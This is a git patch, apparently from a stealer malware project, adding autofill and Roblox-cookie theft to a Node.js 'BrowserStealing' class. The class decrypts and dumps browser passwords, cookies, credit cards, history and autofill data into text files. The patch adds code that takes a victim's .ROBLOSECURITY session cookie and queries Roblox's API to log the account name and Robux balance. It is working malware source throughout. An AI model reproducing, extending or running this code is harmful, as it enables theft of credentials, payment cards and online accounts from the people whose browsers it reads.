From 2eee498ab8d864960a705b2835f1f3a548181537 Mon Sep 17 00:00:00 2001 From: gumbobr0t <96620548+gumbobr0t@users.noreply.github.com> Date: Sat, 25 Nov 2023 22:51:32 +0100 Subject: [PATCH] Add autofill and roblox stealer --- Utils/{browser.js => browser-stealer.js} | 118 +++++++++++++++++++++-- 1 file changed, 112 insertions(+), 6 deletions(-) rename Utils/{browser.js => browser-stealer.js} (80%) diff --git a/Utils/browser.js b/Utils/browser-stealer.js similarity index 80% rename from Utils/browser.js rename to Utils/browser-stealer.js index 3b53b2e..eaed66a 100644 --- a/Utils/browser.js +++ b/Utils/browser-stealer.js @@ -3,6 +3,7 @@ const sqlite3 = require('sqlite3').verbose(); const crypto = require('crypto') const path = require('path') const dpapi = require('./node-dpapi'); +const axios = require('axios'); class BrowserStealing { constructor() { @@ -62,11 +63,12 @@ class BrowserStealing { this.browserProfiles = ['Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5']; this.tempDir = path.join(this.local, 'Temp'); - this.password_command = 'SELECT action_url, username_value, password_value FROM logins'; - this.cookie_command = 'SELECT host_key, name, encrypted_value, expires_utc FROM cookies'; - this.cc_command = 'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards'; - this.history_command = 'SELECT url, title, last_visit_time FROM urls'; - this.downloads_command = 'SELECT tab_url, target_path FROM downloads'; + this.password_command = 'SELECT action_url, username_value, password_value FROM logins;'; + this.cookie_command = 'SELECT host_key, name, encrypted_value, expires_utc FROM cookies;'; + this.cc_command = 'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards;'; + this.history_command = 'SELECT url, title, last_visit_time FROM urls;'; + this.downloads_command = 'SELECT tab_url, target_path FROM downloads;'; + this.autofill_command = 'SELECT * FROM autofill;'; this.passwordFile = path.join(this.phorcyDir, 'browser_passwords.txt'); this.cookieFile = path.join(this.phorcyDir, 'browser_cookies.txt'); @@ -74,6 +76,8 @@ class BrowserStealing { this.historyFile = path.join(this.phorcyDir, 'browser_history.txt'); this.downloadsFile = path.join(this.phorcyDir, 'browser_downloads.txt'); this.bookmarkFile = path.join(this.phorcyDir, 'browser_bookmarks.txt'); + this.autofillFile = path.join(this.phorcyDir, 'browser_autofill.txt'); + this.robloxFile = path.join(this.phorcyDir, 'roblox_cookies.txt'); this.password_count = 0; this.cookie_count = 0; @@ -81,6 +85,8 @@ class BrowserStealing { this.history_count = 0; this.downloads_count = 0; this.bookmark_count = 0; + this.autofill_count = 0; + this.roblox_count = 0; } generateRandomString() { @@ -207,6 +213,26 @@ class BrowserStealing { try { const cookieList = `+------------------------+\n| Host: ${row["host_key"]} |\n| Name: ${row.name ? row.name.toString() : ''} |\n| Cookie value: ${decrypted} |\n| Expiration: ${row['expires_utc']} |\n`; fs.writeFileSync(this.cookieFile, cookieList, { flag: 'a' }); + if ('.ROBLOSECURITY' === row.name.toString()) { + this.roblox_count++; + const robloSecurityo = decrypted + //console.log(robloSecurityo); + let headers = { + 'cookie': `.ROBLOSECURITY=${robloSecurityo};`, + } + + axios.get("https://www.roblox.com/mobileapi/userinfo", { headers }) + .then(response => { + //console.log(response.data); + if (response.data) { + let robloxData = `+------------------------+\n| Username: ${response.data['username']} |\n| User ID: ${response.data['userid']} |\n| Robux Balance: ${response.data['robuxbalance']} |\n| Is Premium? ${response.data['ispremium']} |\n| Cookie: ${robloSecurityo} |\n`; + fs.writeFileSync(this.robloxFile, robloxData, { flag: 'a' }); + } + }) + .catch(err => { + console.error(err); + }); + } } catch (err) { console.error(err); } @@ -218,7 +244,8 @@ class BrowserStealing { console.error(err); } }); - console.log('Cookie count:', this.cookie_count) + console.log('Cookie count:', this.cookie_count); + console.log('Roblox count:', this.roblox_count); }); }); }); @@ -433,6 +460,58 @@ class BrowserStealing { } }; + getAutofill(autofillFile, masterKey) { + const tempFile = path.join(this.tempDir, `${this.generateRandomString()}.phorcy`); + + fs.copyFile(autofillFile, tempFile, (err) => { + if (err) { + console.error(err); + } + + const db = new sqlite3.Database(tempFile, sqlite3.OPEN_READWRITE, (err) => { + if (err) { + console.error(err); + return; + } + + db.all(this.autofill_command, (err, rows) => { + if (err) { + console.error(err); + } else { + rows.map(row => { + //console.log(row); + if (row) { + + this.autofill_count++; + + try { + const autofillList = `+------------------------+\n| Name: ${row['name']} |\n| Value: ${row['value']} |\n| Value_Lower: ${row['value_lower']} |\n| Date Created: ${row['date_created']} |\n| Date Last Used: ${row['date_last_used']} |\n| Count: ${row['count']} |\n`; + fs.writeFileSync(this.autofillFile, autofillList, { flag: 'a' }); + } catch (err) { + console.error(err); + } + } + }); + } + db.close((err) => { + if (err) { + console.error(err); + } + }); + console.log('Autofill count:', this.autofill_count) + }); + }); + }); + + if (this.fileExists(tempFile)) { + fs.unlink(tempFile, (err) => { + if (err) { + console.error(err); + } + }); + } + }; + async Main() { // dir preparation if (!this.fileExists(this.phorcyDir)) { @@ -470,6 +549,7 @@ class BrowserStealing { } // cookie grabber + fs.writeFileSync(this.robloxFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' }); fs.writeFileSync(this.cookieFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' }); for (const browserPath of this.browserPaths) { if (this.fileExists(browserPath)) { @@ -571,6 +651,32 @@ class BrowserStealing { } } } + + // autofill grabber + fs.writeFileSync(this.autofillFile, 't.me/phorcy\n-----------\n\n', { flag: 'a' }); + for (const browserPath of this.browserPaths) { + if (this.fileExists(browserPath)) { + const localState = path.join(browserPath, 'Local State'); + if (this.fileExists(localState)) { + for (const profile of this.browserProfiles) { + const autofillFile = path.join(browserPath, profile, 'Web Data'); + if (this.fileExists(autofillFile)) { + try { + this.getKey(localState, (err, key) => { + if (err) { + console.error(err); + } else { + this.getAutofill(autofillFile, key); + } + }); + } catch (err) { + console.error(err); + } + } + } + } + } + } } }